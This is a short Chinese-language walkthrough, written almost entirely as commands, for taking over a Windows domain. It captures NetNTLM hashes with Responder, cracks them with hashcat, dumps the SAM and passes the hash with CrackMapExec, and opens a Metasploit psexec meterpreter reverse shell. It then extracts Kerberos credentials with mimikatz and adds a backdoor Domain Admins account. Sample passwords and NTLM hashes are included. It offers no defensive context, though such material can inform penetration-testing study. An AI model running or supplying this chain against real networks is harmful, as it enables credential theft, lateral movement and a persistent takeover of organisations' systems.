(1)執行Responder探測內網（https://github.com/lgandx/Responder）

./Responder.py -I eth0 -rPv

（2）獲取172.16.157.133的Responder值

（3）使用Crack Map Exec檢查此主機的NetBIOS信息

cme smb 172.16.157.133

（4）使用hashcat對Responder值進行破解

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

獲取密碼值Winter2018!

（5）CME掃描

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

（6）獲取本地的管理員帳戶對本地密碼散列進行dump

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

（7）獲取FRONTDESK密碼的NTLM哈希值

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

（8）哈希傳遞方式查看本地網絡的smb權限情況

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-

auth

（9）可以登錄172.16.157.134服務器

（10）對172.16.157.134進行查看，該計算機具備域控權限

cme smb 172.16.157.134

（11）msf下面利用smb口令進行shell獲取

use exploit/windows/smb/psexec

set smbpass=aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51

set smbuser administrator

set playload windows/x64/meterpreter/reverse_tcp

run

getuid

（12）使用mimikatz獲取域控密碼

load mimikatz

kerberos

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda

Responder探測內網獲取域控權限總結